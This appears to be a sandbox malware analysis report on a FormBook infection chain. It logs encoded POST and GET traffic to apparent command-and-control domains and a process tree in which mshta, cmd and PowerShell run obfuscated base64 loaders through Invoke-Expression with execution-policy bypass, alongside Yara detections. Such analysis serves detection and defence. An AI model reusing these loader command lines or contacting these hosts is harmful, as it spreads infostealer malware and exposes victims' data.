                                                                                                                                                        Data Raw: 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 69 74 6d 22 3e 3c 6c 69 3e e6 82 a8 e8 ae bf e9 97 ae e7 9a 84 e5 9f 9f e5 90 8d e5 9c a8 e5 b9 b3 e5 8f b0 e4 b8 8a e6 9c aa e9 85 8d e7 bd ae e6 88 96 e8 80 85 e6 9c aa e7 94 9f e6 95 88 3c 2f 6c 69
                                                                                                                                                        Data Ascii: ><div class="oitm"><li></li></div><div class="brdiv"></div><div class="oitm"><li></li></div><div class="brdiv"></div></div><div class="omsg"><div


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        36 | 192.168.2.6 | 50024 | 154.82.100.177 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        Dec 5, 2024 05:41:11.438410997 CET | 830 | OUT | POST /mnl8/ HTTP/1.1
                                                                                                                                                        Host: www.yu12345.xyz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.yu12345.xyz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.yu12345.xyz/mnl8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=cEmwKqL8AnYc/8sVUQrCo5N0B3D2gk57mrkrrTJr2TJVVLmtE4EiY0CHxvSp1pTGjRcJtoEeBw0DdKYlwwF5WP2jPa36JqU6ffWzsrVeeuSJIiW7uku6tmRiWum5kr721pH6VfNpw1NzbqNKTeRWuXpa/IyS0yWgEpa6xT4+HoF4H6QVtQB65Nwt3qJyHa+wpqDIPi/yNA0R9BA8CgzPXC0nSJ8T3etgSA==
Dec 5, 2024 05:41:12.966068029 CET | 1236 | IN | HTTP/1.1 410 Gone
                                                                                                                                                        Server: NgxFence
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:41:12 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 4303
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Ascii: <html><head><title>410</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css' rel='stylesheet'><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css' rel='stylesheet'><style>body{margin: 0px;padding: 0px;font-family: Tahoma, Pingfang SC, Microsoft YaHei, SimSun;font-size: 12px;color: #353535;background-color: #efefef;}.brdiv {clear: both;width: 100%;height: 0px;line-height: 0px;padding: 0px;margin: 0px;border: none;background-color: transparent;background-image: none;}.mdiv{position: absolute;top: 50%;left: 50%;background-color: #fff;width: 800px;height: auto;transform: translate(-50%, -50%);box-shadow: 2px 5px 5px 2px #dfdfdf;padding-bottom: 20px;}.mtd{width: 100%; height: 10px; background-color: #376888;}.mid{margin: 0px auto; text-align: center; padding: 30px 0px; width: 750px; border-bottom: solid 1px #dfdfdf;}.miitm{width: 215px;float: left;font-size: 80px; [TRUNCATED]
Dec 5, 2024 05:41:12.966083050 CET | 1236 | IN
                                                                                                                                                        Data Ascii: ght: 30px;float: left;font-size: 15px;font-weight: bold;color: #353535;}.miitm .fa-check-circle,.miitm .fa-times-circle,.miitm .fa-question-circle{font-size: 20px;position: absolute;bottom: 0px;right: 60px;}.mil{ width: 60px;height: 80px;flo
Dec 5, 2024 05:41:12.966094017 CET | 1236 | IN
                                                                                                                                                        Data Ascii: : 100%; text-align:center; float: left;height: 25px;line-height: 25px;overflow: hidden;}a{text-decoration: none;}a:hover{text-decoration:underline;}a:visited{color: blue;}.reqid{font-family: monospace;font-weight: bold;}.mwm{z-index: -1;w
Dec 5, 2024 05:41:12.966105938 CET | 737 | IN
                                                                                                                                                        Data Ascii: ><div class="oitm"><li></li></div><div class="brdiv"></div><div class="oitm"><li></li></div><div class="brdiv"></div></div><div class="omsg"><div


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 50025 | 154.82.100.177 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:41:14.098176003 CET | 1843 | OUT | POST /mnl8/ HTTP/1.1
                                                                                                                                                        Host: www.yu12345.xyz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.yu12345.xyz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.yu12345.xyz/mnl8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 50026 | 154.82.100.177 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:41:16.758666039 CET | 547 | OUT | GET /mnl8/?ZrE=RGOQJd/YEggQptEich3q6d0bfn/irFBnx+ZpwzxB5TUNCs3vZOAWTRyo0cim1/zDkhtz3OYESkByNsQcxwF9aubDKJHPAYECM7rOvY9yH/ydWUGi/0eSoW1GLP2ssLvhhZDeTZQ=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.yu12345.xyz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 5, 2024 05:41:18.279335976 CET | 1236 | IN | HTTP/1.1 410 Gone
                                                                                                                                                        Server: NgxFence
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:41:18 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 4303
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Ascii: <html><head><title>410</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css' rel='stylesheet'><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css' rel='stylesheet'><style>body{margin: 0px;padding: 0px;font-family: Tahoma, Pingfang SC, Microsoft YaHei, SimSun;font-size: 12px;color: #353535;background-color: #efefef;}.brdiv {clear: both;width: 100%;height: 0px;line-height: 0px;padding: 0px;margin: 0px;border: none;background-color: transparent;background-image: none;}.mdiv{position: absolute;top: 50%;left: 50%;background-color: #fff;width: 800px;height: auto;transform: translate(-50%, -50%);box-shadow: 2px 5px 5px 2px #dfdfdf;padding-bottom: 20px;}.mtd{width: 100%; height: 10px; background-color: #376888;}.mid{margin: 0px auto; text-align: center; padding: 30px 0px; width: 750px; border-bottom: solid 1px #dfdfdf;}.miitm{width: 215px;float: left;font-size: 80px; [TRUNCATED]
Dec 5, 2024 05:41:18.279386997 CET | 1236 | IN
                                                                                                                                                        Data Ascii: ght: 30px;float: left;font-size: 15px;font-weight: bold;color: #353535;}.miitm .fa-check-circle,.miitm .fa-times-circle,.miitm .fa-question-circle{font-size: 20px;position: absolute;bottom: 0px;right: 60px;}.mil{ width: 60px;height: 80px;flo
Dec 5, 2024 05:41:18.279402018 CET | 1236 | IN
                                                                                                                                                        Data Ascii: : 100%; text-align:center; float: left;height: 25px;line-height: 25px;overflow: hidden;}a{text-decoration: none;}a:hover{text-decoration:underline;}a:visited{color: blue;}.reqid{font-family: monospace;font-weight: bold;}.mwm{z-index: -1;w
Dec 5, 2024 05:41:18.279472113 CET | 737 | IN
                                                                                                                                                        Data Ascii: ><div class="oitm"><li></li></div><div class="brdiv"></div><div class="oitm"><li></li></div><div class="brdiv"></div></div><div class="omsg"><div


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 50028 | 199.115.230.222 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:41:23.831207037 CET | 803 | OUT | POST /e3vj/ HTTP/1.1
                                                                                                                                                        Host: www.qmmkl.buzz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.qmmkl.buzz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.qmmkl.buzz/e3vj/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=NrYfpyoqLYrmxfVvLScv0oDzNknmLHZxiVVeKmcJce+GMnEQqJ6hgdwVvJ520EoR4nHclcwKHM0LNXushjCln/KZtMR4C2ClBV6JtgjaPxHw4oxsdbzwJ0xbAAI23qzDFBQ7AvXdTnQl1z9q1hKg6v7BpaSfYkRVnTsuSQZlaSQvZuc7RkfcgV2madWAbbPx/fOFlTN9onG3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 50029 | 199.115.230.222 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:41:26.483891010 CET | 827 | OUT | POST /e3vj/ HTTP/1.1
                                                                                                                                                        Host: www.qmmkl.buzz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.qmmkl.buzz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.qmmkl.buzz/e3vj/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=NrYfpyoqLYrmw/lvJzcvjYDyR0nmSXZ1iVReKnJUcMKGMC4Q446hu9wVnp53wEoG4nahlZQKHMgLNSqsh02q1fKb08R6MWClBV6JtgGPPxfw5b5sPOHzK0xaBAI2m6zHFBRuAub3TlYl1ytqy0mjt/7bk6T1WWYZmwZNaA1lbQBLR4dhNXf/yFWkafOyb7Pb9f2F3EBanTjUtQ4xI8iQCJT6A2NkIaSIWg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 50030 | 199.115.230.222 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:41:29.146425962 CET | 1840 | OUT | POST /e3vj/ HTTP/1.1
                                                                                                                                                        Host: www.qmmkl.buzz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.qmmkl.buzz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.qmmkl.buzz/e3vj/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 50031 | 199.115.230.222 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:41:31.793647051 CET | 546 | OUT | GET /e3vj/?Jr=tnaxxtx&ZrE=Apw/qEhkM9PBzv16DC8g1MSIQhvVD2Vj01FPVXV4CfqJVQ1J3uaJteAUq9BD3RYf6FzZ09NLBogJcHSO0hmFge+YoOQSOFa9DG3d+S6Zcyz3+NwsM7PgNDQLFA8HvIbfdwoJPYw= HTTP/1.1
                                                                                                                                                        Host: www.qmmkl.buzz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:23:37:52
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:mshta.exe "C:\Users\user\Desktop\maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta"
                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                        File size:13'312 bytes
                                                                                                                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:1
                                                                                                                                                        Start time:23:37:52
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"
                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:23:37:52
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:23:37:53
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"
                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:23:37:55
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"
                                                                                                                                                        Imagebase:0x4d0000
                                                                                                                                                        File size:2'141'552 bytes
                                                                                                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:23:37:55
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP"
                                                                                                                                                        Imagebase:0xa10000
                                                                                                                                                        File size:46'832 bytes
                                                                                                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:23:38:01
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS"
                                                                                                                                                        Imagebase:0xc40000
                                                                                                                                                        File size:147'456 bytes
                                                                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:23:38:02
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = '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';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:23:38:02
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:23:38:27
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                        Imagebase:0x4d0000
                                                                                                                                                        File size:56'368 bytes
                                                                                                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:23:38:29
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe"
                                                                                                                                                        Imagebase:0xdf0000
                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:23:38:30
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\ieUnatt.exe"
                                                                                                                                                        Imagebase:0x8f0000
                                                                                                                                                        File size:122'880 bytes
                                                                                                                                                        MD5 hash:4E9919DF2EF531B389ABAEFD35AD546E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:16
                                                                                                                                                        Start time:23:38:55
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                        Imagebase:0x7ff728280000
                                                                                                                                                        File size:676'768 bytes
                                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000003.2090570311.00000000067E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_3_67e0000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
